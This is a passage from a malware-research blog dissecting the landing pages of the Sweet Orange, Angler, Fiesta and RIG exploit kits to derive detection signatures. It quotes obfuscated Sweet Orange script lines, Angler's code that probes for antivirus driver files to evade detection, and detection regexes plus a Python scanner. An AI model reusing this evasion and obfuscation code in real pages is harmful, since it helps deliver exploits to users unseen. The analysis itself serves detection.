The posted data does not execute in the panel, as it is escaped on output, but it does make it possible to leave a message for the actor(s) running the panel.<br />
<br />
<h4>
Conclusion</h4>
The vulnerabilities might very well exist in more places, but the ones described here do enable, for example, researchers to battle malware and malware campaigns.<br />
<br />
By enumerating commands from the panel, it's possible to follow the actor's steps by downloading the malware and plugins that the bot is instructed to download.<br />
<br />
It's also possible to leave a message in the form of keylogs and formgrabs to let the actor(s) know that they are under observation.<br />
<br />
<h3>
Recommended Reading</h3>
<ul>
<li><a href="http://int0xcc.svbtle.com/how-to-bypass-zeus-trojans-self-protection-mechanism">How to bypass Zeus Trojan’s self protection mechanism</a></li>
</ul>
<br />
<h3>
Landingpages bites the dust - Sweet Orange</h3>
<i>Posted 2014-08-21</i><br />
Sweet Orange (SO) has become more and more rare lately, but it's one of the kits whose landingpage hasn't changed at all.<br />
<br />
<h4>
Basic Structure</h4>
SO carries one of the biggest landingpages of all the kits, 280-300 KB, and every one of them includes a string of 6-8 bytes that works as the delimiter for the "main" script in the landingpage.<br />
<br />
It also includes legitimate HTML, taken from real webpages, to make it look like a legitimate page. The sample used in this post can be found on [<a href="http://pastebin.com/cw3AVJLq">pastebin</a>]. A Google search shows that the HTML originates from <i>www.mariposamuseum.org/world_instruments03.html</i>; the only difference is that the word <i>Idiophones</i> has been replaced with <i>Large Cloud</i>:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdNBmGfOZI2ZCMvlbuV4pPjOlPJMnrJ5OoKfqJy2cWv9yNjpJ40fgsLQE7LqFoc8M9mVnITdLMLCvdwo0zS5GcO_RuCmilvfVA6xzlLzDLG6vK_EDcbT1wluCKBmC2_C-l1-n6x7Cyt10/s1600/sweet_orange_landingpage_html.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdNBmGfOZI2ZCMvlbuV4pPjOlPJMnrJ5OoKfqJy2cWv9yNjpJ40fgsLQE7LqFoc8M9mVnITdLMLCvdwo0zS5GcO_RuCmilvfVA6xzlLzDLG6vK_EDcbT1wluCKBmC2_C-l1-n6x7Cyt10/s1600/sweet_orange_landingpage_html.png" height="120" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Sweet Orange HTML compared to legitimate webpage</td></tr>
</tbody></table>
After the decoy HTML, the malicious script starts. The plugin detection is hidden in an <b>li</b>-tag which is subject to replacement at the bottom of the landingpage.<br />
<br />
There are two levels of obfuscation. First the delimiter is removed, revealing the main script; however, all <b>&</b>, <b><</b>, <b>></b> and <b>%</b> characters are missing from it. Those are put back at the end using <b>String.replace</b>, which is the second level.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKtmHG8_zSU6bT-_2RhzxZ8vwfFuZwqpoudIeRgMIT0Nhdl2ynvwpZdLAPjV2nHcCTGoTqz59_1HkFXmQ4vi8XWOaKE7PtGSebE0iNqLQqkub4f9K0pi8YxPIwBJDaeVBkQ2qfSEuHjkM/s1600/sweet_orange_landingpage_decode.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKtmHG8_zSU6bT-_2RhzxZ8vwfFuZwqpoudIeRgMIT0Nhdl2ynvwpZdLAPjV2nHcCTGoTqz59_1HkFXmQ4vi8XWOaKE7PtGSebE0iNqLQqkub4f9K0pi8YxPIwBJDaeVBkQ2qfSEuHjkM/s1600/sweet_orange_landingpage_decode.png" height="71" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">String replacement in landingpage</td></tr>
</tbody></table>
<br />
<h4>
Client identification</h4>
The main script [<a href="http://pastebin.com/9jCqdhCd">pastebin</a>] checks for browser version and Flash version before launching any exploits. The function names are not obfuscated, making it easy to read.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqE07-sfJN8BXelEKFCDZMtQEW4X-Cu-_2LObLBEgIUW0Jf9R8rjkN1fwBLOGvJr14lcevfjHltoMQeghF7Jy1LOWDlsXtLIhxoSxoSJCuK5_meJtoZHmvSm6yaHJt1JYrdPJoFytX_CM/s1600/sweet_orange_landingpage_ie.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqE07-sfJN8BXelEKFCDZMtQEW4X-Cu-_2LObLBEgIUW0Jf9R8rjkN1fwBLOGvJr14lcevfjHltoMQeghF7Jy1LOWDlsXtLIhxoSxoSJCuK5_meJtoZHmvSm6yaHJt1JYrdPJoFytX_CM/s1600/sweet_orange_landingpage_ie.png" height="345" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Check browser and launch IE exploit</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQA-CkUnjOs2EPBNYKZ7nDhxWeTA16KhSwK4eSv44d7X28kHhbsJout7Fyvhe0OF0Gaxa4GuTq_r1wBirdm6ivsar-h8d6UrX6EyMbQmEj31otJI5MxaahxA1HGZuW2ipP-SvF8cJonn8/s1600/sweet_orange_landingpage_swf.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQA-CkUnjOs2EPBNYKZ7nDhxWeTA16KhSwK4eSv44d7X28kHhbsJout7Fyvhe0OF0Gaxa4GuTq_r1wBirdm6ivsar-h8d6UrX6EyMbQmEj31otJI5MxaahxA1HGZuW2ipP-SvF8cJonn8/s1600/sweet_orange_landingpage_swf.png" height="223" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Check Flash and launch Flash exploit</td></tr>
</tbody></table>
Last but not least, a JNLP will be loaded in preparation for Java exploitation.<br />
<br />
There isn't really that much to it in terms of advanced techniques or tricks.<br />
<br />
<h4>
Detection</h4>
Here are a few examples taken from Sweet Orange throughout the year.<br />
<u><b>2014-04-20:</b></u><br />
<pre class="brush: js">ubjCzzjOSb = jinLOqHUrn.substring(60).replace(/jeR--_33S/, "");
ubjCzzjOSb = ubjCzzjOSb["xRadwPhBvkonCnYGSLGSNR".charAt(21).toString().toLowerCase() + "zQYbiTsKBgHRMmboJTCAUePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__mb3__/, "<");
ubjCzzjOSb = ubjCzzjOSb["BVsXCvUwSbVDbYmIAxdwKR".charAt(21).toString().toLowerCase() + "BuMUiFRjDVDxOELrHlydsePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__Ob8__/, ">");
ubjCzzjOSb = ubjCzzjOSb["VgIvbfxtpUcdELmXlPMuDR".charAt(21).toString().toLowerCase() + "cluTqHOwGCviXBvPObDlaePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__Hb7__/, "&");
ubjCzzjOSb = ubjCzzjOSb["UJchLeVPhClZLEBVWleeBR".charAt(21).toString().toLowerCase() + "RzifGzNyuLgkuWfsJdvktePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__Nc0__/, "%");</pre>
<br />
<u><b>2014-06-28:</b></u><br />
<pre class="brush: js">mmSGqncKVi = DkPBNuJiFk.substring(60).replace(/ZJXm-_7q2/, "");
mmSGqncKVi = mmSGqncKVi["svcUQTPiOxzQewMHjxUSmR".charAt(21).toString().toLowerCase() + "ynnIJcpckBccKDamANMALePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__hhg7_/, "<");
mmSGqncKVi = mmSGqncKVi["IJvXqlxwzJjPMiYeTCdJUR".charAt(21).toString().toLowerCase() + "XTLpgjtTeESBeyEKjWQhGePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__Db8__/, ">");
mmSGqncKVi = mmSGqncKVi["fCDSsWebkuqhbWMWbZLChR".charAt(21).toString().toLowerCase() + "lkgHcnCcpWveIGpoYMNStePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/_uio0__/, "&");
mmSGqncKVi = mmSGqncKVi["uNADVNFPkHZaUlEcMVVyTR".charAt(21).toString().toLowerCase() + "tUFiudmZYpEKgtNxoehPuePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__cc0__/, "%");</pre>
<br />
<u><b>2014-08-20:</b></u><br />
<pre class="brush: js">PoBpsXFGOP = jUkalrchvM.substring(60).replace(/n5Xc4_7w9/, "");
PoBpsXFGOP = PoBpsXFGOP["hhFcPPScoahJvsMypMhooR".charAt(Math.sqrt(441)).toString().toLowerCase() + "ghoAJERaNwXAkWJcmsXBoePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__hhg7_/, "<");
PoBpsXFGOP = PoBpsXFGOP["qaBaJkOMfRPHHqyRBmGnZR".charAt(Math.sqrt(441)).toString().toLowerCase() + "LNlIfrpfGHpeqyJtyGMJlePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__Db8__/, ">");
PoBpsXFGOP = PoBpsXFGOP["gfZrLHSdOjKprxNoOQqXFR".charAt(Math.sqrt(441)).toString().toLowerCase() + "KzlUJPpCvqIVcAZhjsNGZePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/_uio0__/, "&");
PoBpsXFGOP = PoBpsXFGOP["LBeVqPfZzJLqgNhrMJNIMR".charAt(Math.sqrt(441)).toString().toLowerCase() + "wXWMEtMqIJmHaazzTqEOcePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__cc0__/, "%");</pre>
<br />
The pattern below is found to be consistent across all the landingpages (not limited to the samples above).<br />
<br />
<b>.substring(21, 28).toLowerCase() + "Ace".toLowerCase()] </b><br />
<br />
This makes it possible to detect and block Sweet Orange before any exploit is launched.<br />
<h4>
Resources</h4>
Check out <a href="http://malware-traffic-analysis.net/2014/08/20/index.html">Malware-traffic-analysis.net</a> for more examples and live traffic from Sweet Orange. The post includes links to all captures done by <a href="https://twitter.com/malware_traffic">@malware_traffic</a> (big thanks for providing data!).
<h3>Landingpages bites the dust - Angler</h3>
Published 2014-08-02, updated 2014-08-02 (Anonymous).
<h4>
Basic structure</h4>
The landingpage is built up of two stages of obfuscation, with five containers of obfuscated data at the beginning of the page (one per line), each with its own specific purpose. In the landingpage used in this example [<a href="http://pastebin.com/qAVuS6w0">pastebin</a>] you'll find these five on lines 28-32.<br />
<br />
After the five containers comes the function for deobfuscating and executing the code in each container.<br />
<br />
The section that comes next includes obfuscated strings which will be used by the code in the containers at the top; these include the domain and URIs for the exploits.<br />
<br />
The rest of the landingpage is simply just a decoy to make the page look "legit".<br />
<br />
<h4>
Client identification</h4>
Angler does not only use plugin detection to identify vulnerable versions; it also employs detection of installed anti-virus software. This is done by the code in the first container. The code can be found by setting a breakpoint on the line calling <b>eval()</b> in the deobfuscation function:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyQFdqQJKuPav8S5S0xNXRtgVdUjITTyQJvXVHK540pnrdlMFAuaUk17lEb7OHQHyEXCNG5Wlx4I-ipwsnhxfd0IhuDm3W2H-eOW_rpbhEr2qC_lR-R4Xa3Fnq34gi_kRIEfn39OFuKtA/s1600/angler_landingpage_eval1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyQFdqQJKuPav8S5S0xNXRtgVdUjITTyQJvXVHK540pnrdlMFAuaUk17lEb7OHQHyEXCNG5Wlx4I-ipwsnhxfd0IhuDm3W2H-eOW_rpbhEr2qC_lR-R4Xa3Fnq34gi_kRIEfn39OFuKtA/s1600/angler_landingpage_eval1.png" height="384" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Firefox Webdeveloper Debugger</td></tr>
</tbody></table>
The contents of <b>HzV0</b> give us the code:<br />
<pre class="brush: js">// Probes a local file path through Microsoft.XMLDOM and treats parse error
// -2147023083 as "file present" (the Operation Snowman technique referenced below).
function gs7sfd(txt) {
    var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
    xmlDoc.async = true;
    xmlDoc.loadXML(''); // argument is empty as rendered in the post; txt is the path being probed
    if (xmlDoc.parseError.errorCode != 0) {
        var err = "Error Code: " + xmlDoc.parseError.errorCode + "\n";
        err += "Error Reason: " + xmlDoc.parseError.reason;
        err += "Error Line: " + xmlDoc.parseError.line;
        if (err.indexOf("-2147023083") > 0) {
            return 1;
        } else {
            return 0;
        }
    }
    return 0;
}
// Kaspersky (kl1.sys) and TrendMicro (tm*.sys) driver files: if any is present,
// the flags that gate the exploits are cleared and the attempt is abandoned.
if (gs7sfd("c:\\Windows\\System32\\drivers\\kl1.sys") ||
    gs7sfd("c:\\windows\\system32\\drivers\\tmactmon.sys") ||
    gs7sfd("c:\\windows\\system32\\drivers\\tmcomm.sys") ||
    gs7sfd("c:\\windows\\system32\\drivers\\tmevtmgr.sys") ||
    gs7sfd("c:\\windows\\system32\\drivers\\TMEBC32.sys") ||
    gs7sfd("c:\\windows\\system32\\drivers\\tmeext.sys") ||
    gs7sfd("c:\\windows\\system32\\drivers\\tmnciesc.sys") ||
    gs7sfd("c:\\windows\\system32\\drivers\\tmtdi.sys")) {
    window['zxtbVDMp'] = true;
    BzJUQufh = '';
    window.sf325gtgs7sfdj = window.sf325gtgs7sfds = window.sf325gtgs7sfdf1 = window.sf325gtgs7sfdf2 = false;
};
</pre>
<br />
<br />
If it finds that Kaspersky or TrendMicro anti-virus is installed, it cancels the intrusion attempt, since it is likely to fail and would create unwanted noise (alerts from the anti-virus). Another interesting part is that the landingpage of <a href="http://thembits.blogspot.se/2014/07/landingpages-bites-dust-rig.html">RIG</a> uses the exact same code, which was originally found in <a href="http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html">"Operation Snowman"</a>.<br />
<br />
The code in the second container is responsible for checking the versions of installed plugins, but also contains the function for decoding the strings listed in the original landingpage, where the key is defined in the variable ending with <b>0</b>:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBday5-LRFtoAGMM-Ckco7MqgdXTWEex51c1f4bp-KOp_f5QzgD6pJ0iQ6uF5gwQymlzYRl_KQtaSTdrQuv-27N891du7-p9MlzW2Viu1cGr1i5Q48ka4cMI94_0t1CEYZYDf4wCT1sac/s1600/angler_landingpage_cryptKey.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBday5-LRFtoAGMM-Ckco7MqgdXTWEex51c1f4bp-KOp_f5QzgD6pJ0iQ6uF5gwQymlzYRl_KQtaSTdrQuv-27N891du7-p9MlzW2Viu1cGr1i5Q48ka4cMI94_0t1CEYZYDf4wCT1sac/s1600/angler_landingpage_cryptKey.png" height="150" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Original landingpage on the left, code in second container on the right</td></tr>
</tbody></table>
The third container holds the code that generates the code used for loading a Silverlight exploit:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh60m3WyJAvIuoP03JwRkZdJD-4xyVy5ls3TnHwOY0phAFRoUn90Zq8X6JnZ0eZR7qUecQgdyTQuDb6Yxrxj3NwWjaZf-6uMindfD4PzJ4-_7j6CjZbaF_kIVFwTP2z2QkMfRoyFQS0cQ/s1600/angler_landingpage_silverlight.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh60m3WyJAvIuoP03JwRkZdJD-4xyVy5ls3TnHwOY0phAFRoUn90Zq8X6JnZ0eZR7qUecQgdyTQuDb6Yxrxj3NwWjaZf-6uMindfD4PzJ4-_7j6CjZbaF_kIVFwTP2z2QkMfRoyFQS0cQ/s1600/angler_landingpage_silverlight.png" height="182" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Original landingpage on the left, code in third container on the right</td></tr>
</tbody></table>
The same approach is used for the Flash exploit. If none of Silverlight, Flash or Java is found to be installed, it resorts to the Internet Explorer exploit if the version is > 10.<br />
<br />
A summary of all deobfuscated sections can be found on pastebin. [<a href="http://pastebin.com/YBPKd9kM">pastebin</a>]<br />
<br />
<h4>
Detection</h4>
Angler is one of the kits whose landingpage request has a generic look; the response, however, is another story, as shown above.<br />
<br />
The top containers change from instance to instance, but the variables after the deobfuscation function don't (i.e. the variables ending with 0-11); they follow the same pattern. Some examples:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3weYMmGk143UgQP4XRVixTYM6mwDCK4c_kcQNFMVD3H_B-K3unag4lx2UdNLtX3wnikEaWpG1iQc0YZyLxUsGG9sbCyUYCM6Rn5Kc52pU9-CG33kcFQsOrM1Q5ICBAoQlGXaItRUjCmE/s1600/angler_landingpage_keys.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3weYMmGk143UgQP4XRVixTYM6mwDCK4c_kcQNFMVD3H_B-K3unag4lx2UdNLtX3wnikEaWpG1iQc0YZyLxUsGG9sbCyUYCM6Rn5Kc52pU9-CG33kcFQsOrM1Q5ICBAoQlGXaItRUjCmE/s1600/angler_landingpage_keys.png" height="272" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Three different landingpages</td></tr>
</tbody></table>
The most noticeable one is the variable ending with <b>0</b>, which, as shown earlier, holds the deobfuscation key, which is always 20 bytes. This gives a suggested pattern of:<br />
<b>/[A-Za-z]{6}([0-9])?0\s=\s'[A-Za-z0-9]{20}',\x0a/</b><br />
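As an added example that is not part of either post, the following Python script applies the Sweet Orange construction and the suggested Angler key pattern to sample response bodies, and statically resolves the Sweet Orange property access (both the charAt(21) and the charAt(Math.sqrt(441)) forms) to show that it spells out <b>replace</b>. The two Sweet Orange lines are taken from the samples in the Sweet Orange post; the Angler variable block and the benign line are constructed.

```python
import re

# Signature from the Sweet Orange post: the construction of the "replace" method
# name that was found in every landingpage examined.
SWEET_ORANGE_SIG = re.compile(
    r'\.substring\(21, 28\)\.toLowerCase\(\) \+ "Ace"\.toLowerCase\(\)\]'
)

# Pattern suggested in the Angler post: the variable ending in 0 that holds the
# 20-byte deobfuscation key (/[A-Za-z]{6}([0-9])?0\s=\s'[A-Za-z0-9]{20}',\x0a/).
ANGLER_KEY_SIG = re.compile(r"[A-Za-z]{6}([0-9])?0\s=\s'[A-Za-z0-9]{20}',\n")

# One Sweet Orange property access, covering both the literal charAt(21) form and
# the charAt(Math.sqrt(441)) variant seen on 2014-08-20.
PROP_RE = re.compile(
    r'\["([A-Za-z]+)"\.charAt\((\d+|Math\.sqrt\((\d+)\))\)\.toString\(\)\.toLowerCase\(\)'
    r' \+ "([A-Za-z]+)"\.substring\((\d+), (\d+)\)\.toLowerCase\(\)'
    r' \+ "([A-Za-z]+)"\.toLowerCase\(\)\]'
)


def resolve_property(match):
    """Evaluate one matched property access the way the JS engine would, without eval()."""
    first, idx_expr, sqrt_arg, second, start, end, tail = match.groups()
    idx = int(int(sqrt_arg) ** 0.5) if sqrt_arg else int(idx_expr)
    # JS charAt() yields "" for an out-of-range index; substring() clamps to the length,
    # which Python slicing does as well.
    head = first[idx].lower() if 0 <= idx < len(first) else ""
    return head + second[int(start):int(end)].lower() + tail.lower()


def resolve_sweet_orange_calls(body):
    """Statically resolve every obfuscated property access in a landingpage body."""
    return [resolve_property(m) for m in PROP_RE.finditer(body)]


def scan_response(body):
    """Return the kits whose landingpage signature matches an HTTP response body."""
    hits = []
    if SWEET_ORANGE_SIG.search(body):
        hits.append("Sweet Orange")
    if ANGLER_KEY_SIG.search(body):
        hits.append("Angler")
    return hits


# Two lines taken from the Sweet Orange samples (2014-04-20 and 2014-08-20).
SWEET_ORANGE_SAMPLE = (
    'ubjCzzjOSb = ubjCzzjOSb["xRadwPhBvkonCnYGSLGSNR".charAt(21).toString().toLowerCase()'
    ' + "zQYbiTsKBgHRMmboJTCAUePl".substring(21, 28).toLowerCase()'
    ' + "Ace".toLowerCase()](/__mb3__/, "<");\n'
    'PoBpsXFGOP = PoBpsXFGOP["hhFcPPScoahJvsMypMhooR".charAt(Math.sqrt(441)).toString().toLowerCase()'
    ' + "ghoAJERaNwXAkWJcmsXBoePl".substring(21, 28).toLowerCase()'
    ' + "Ace".toLowerCase()](/__hhg7_/, "<");\n'
)

# Constructed stand-in for the Angler variable block (the key value is made up).
ANGLER_SAMPLE = (
    "var a;\n"
    "qwerty0 = 'A1B2C3D4E5F6G7H8I9J0',\n"
    "qwerty1 = 'zzzz',\n"
)

# Constructed benign page: ordinary use of replace() must not trigger either signature.
BENIGN_SAMPLE = 'document.title = document.title.replace(/\\s+/, " ");\n'

if __name__ == "__main__":
    print(resolve_sweet_orange_calls(SWEET_ORANGE_SAMPLE))  # ['replace', 'replace']
    print(scan_response(SWEET_ORANGE_SAMPLE))               # ['Sweet Orange']
    print(scan_response(ANGLER_SAMPLE))                     # ['Angler']
    print(scan_response(BENIGN_SAMPLE))                     # []
```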
<h4>
Resources</h4>
For those who use Snort/Suricata, which only capture the trigger packet, this script can help decode the strings and reveal the source domain. [<a href="http://pastebin.com/8Vz65qvg">pastebin</a>]<br />
<br />
More examples of Angler can be found at <a href="http://malware-traffic-analysis.net/">malware-traffic-analysis.net</a><br />
<br />
<h3>Landingpages bites the dust - Fiesta</h3>
Published 2014-07-25, updated 2014-08-02 (Anonymous).
Fiesta is one of the kits which has been around for quite some time and hasn't undergone any major changes. The URI of the landingpage has changed, but not the landingpage itself.<br />
<br />
<h4>
Basic structure</h4>
Fiesta uses string obfuscation to hide the links to exploits, which are then concatenated to form the landingpage. There isn't much more to it than that, so let's move on to client identification and detection.<br />
<br />
<h4>
Client identification</h4>
Fiesta doesn't employ any detection of anti-virus or virtual environments as Angler does, nor does it use PluginDetect; it simply uses its own implementation for detecting installed plugins.<br />
<br />
It runs the detection for each plugin, top to bottom, and directly after each check it loads an exploit if the plugin is found to be vulnerable, as shown below (comments added by me):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh15NTJvZXQMN_zQimK3LKhIzH9UYkIffsceNOAuKTOy6b040TJqH2idzPDI0DFIDNq1hJ1-JN94J0Lx_D9EuF6UJT5oi2e4XYwYcxA7d2Ris-y5OoOPtMB-AQPaiPiYDliNvd9mVczd2w/s1600/fiesta_landingpage_adobe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh15NTJvZXQMN_zQimK3LKhIzH9UYkIffsceNOAuKTOy6b040TJqH2idzPDI0DFIDNq1hJ1-JN94J0Lx_D9EuF6UJT5oi2e4XYwYcxA7d2Ris-y5OoOPtMB-AQPaiPiYDliNvd9mVczd2w/s1600/fiesta_landingpage_adobe.png" height="424" width="640" /></a></div>
<br />
The sample from above can be found here: [<a href="http://pastebin.com/VeBmAnJW">pastebin, raw</a>] [<a href="http://pastebin.com/PmdTKa77">pastebin, decoded</a>]<br />
<br />
<h4>
Detection</h4>
Fiesta has made small changes to the landingpage URI during the last year, using for example:<br />
<i>domain.tld/anfjsf4/2</i><br />
<i>domain.tld/skejgq7/?1</i><br />
<i>domain.tld/ajdw2ja/osf3tyzhuohcvpxoythoclzqruiis6rxd9w</i><br />
<br />
The landingpage itself, however, hasn't changed beyond the obfuscation key, which is changed approximately every 7 days.<br />
<br />
The key can be identified in the first Javascript function in the response, as shown in the PCAPs below:<br />
Example one:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAoZGibONKb9X8VWNm5bBzCcQ2LrJXJoxcd34yaQAYCFllNdOTGoUKya30VLK1jt15Pt-0tT0BJzd5znwQ465KdgUAfeKCZ5xz8o_rrc_GuY0cMfV3mkfTUHUBk6Y7ucJ-FLgl53rB9Qk/s1600/fiesta_landingpage_key1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAoZGibONKb9X8VWNm5bBzCcQ2LrJXJoxcd34yaQAYCFllNdOTGoUKya30VLK1jt15Pt-0tT0BJzd5znwQ465KdgUAfeKCZ5xz8o_rrc_GuY0cMfV3mkfTUHUBk6Y7ucJ-FLgl53rB9Qk/s1600/fiesta_landingpage_key1.png" height="134" width="640" /></a></div>
Example two:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX619_vFJwk0UkR70sdgWoRtaK2nZgCnWVYvA-dYa54MbhOtkS-pbkgWv4BERphiT-PjAIX2wiVswv-6uRqbXoRiGQGwwMegmW5H73K1sCVsUgigIdHyr0eIQXLbuEI329CgkTnc9dDgU/s1600/fiesta_landingpage_key2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX619_vFJwk0UkR70sdgWoRtaK2nZgCnWVYvA-dYa54MbhOtkS-pbkgWv4BERphiT-PjAIX2wiVswv-6uRqbXoRiGQGwwMegmW5H73K1sCVsUgigIdHyr0eIQXLbuEI329CgkTnc9dDgU/s1600/fiesta_landingpage_key2.png" height="134" width="640" /></a></div>
Example three:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQI77CVHn9EneBh_eesN8S4STi4G98y-LLjykQ57EAlBA3HpNL3rval5OeQr03krZTvtT8lNA294nBcOEO4TO3zrtv5C4kdsUn6LWZXGEvbxkvFcWeWg-CDrpz4CG6JRNDklEGp3U8WfY/s1600/fiesta_landingpage_key3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQI77CVHn9EneBh_eesN8S4STi4G98y-LLjykQ57EAlBA3HpNL3rval5OeQr03krZTvtT8lNA294nBcOEO4TO3zrtv5C4kdsUn6LWZXGEvbxkvFcWeWg-CDrpz4CG6JRNDklEGp3U8WfY/s1600/fiesta_landingpage_key3.png" height="146" width="640" /></a></div>
<br />
Examples two and three use the same key, but the rest differs, for example function and variable names; the key, however, stays the same.<br />
<br />
The same key will also be used for deobfuscating the IE exploit.<br />
<br />
<h4>
Resources</h4>
This script can be used to decode the strings in the landingpage [<a href="http://pastebin.com/T6D9nv5Z">pastebin</a>].<br />
More examples of Fiesta can be found at <a href="http://malware-traffic-analysis.net/">malware-traffic-analysis.net</a><br />
<br />
<h3>Landingpages bites the dust - RIG</h3>
Published 2014-07-25, updated 2014-07-25 (Anonymous).
<h4>
Basic structure</h4>
<div>
<br />
RIG has adopted a "top-to-bottom" approach when executing its code. The page starts with checks for installed anti-virus before moving on to deobfuscate and execute exploits (more on this in the next section). The sample used in this post can be found <a href="http://pastebin.com/t2wE7UM3">[raw]</a> and <a href="http://pastebin.com/HKLn83Uj">[decoded]</a> (exploits).<br />
<br />
The exploits are split into sections, where for each line a portion of the code is concatenated into a long string:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGCv45mDzhoGzBGY9VW66ZhpJUEgjH1KH55orReMuizijWjK9YGUOvpYH3ftqt5dXOHZhtI8se8Aby0SVrMcn6UjT7pHWsFKqguj12s_dt11NJz2XVVPFL1Q9h8YxjWNIK5fnLTJirp1c/s1600/rig_landingpage_concat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGCv45mDzhoGzBGY9VW66ZhpJUEgjH1KH55orReMuizijWjK9YGUOvpYH3ftqt5dXOHZhtI8se8Aby0SVrMcn6UjT7pHWsFKqguj12s_dt11NJz2XVVPFL1Q9h8YxjWNIK5fnLTJirp1c/s1600/rig_landingpage_concat.png" height="320" width="316" /></a></div>
The capture below shows the decoding used once all the portions have been concatenated:<br />
<div class="separator" style="clear: both; text-align: center;">
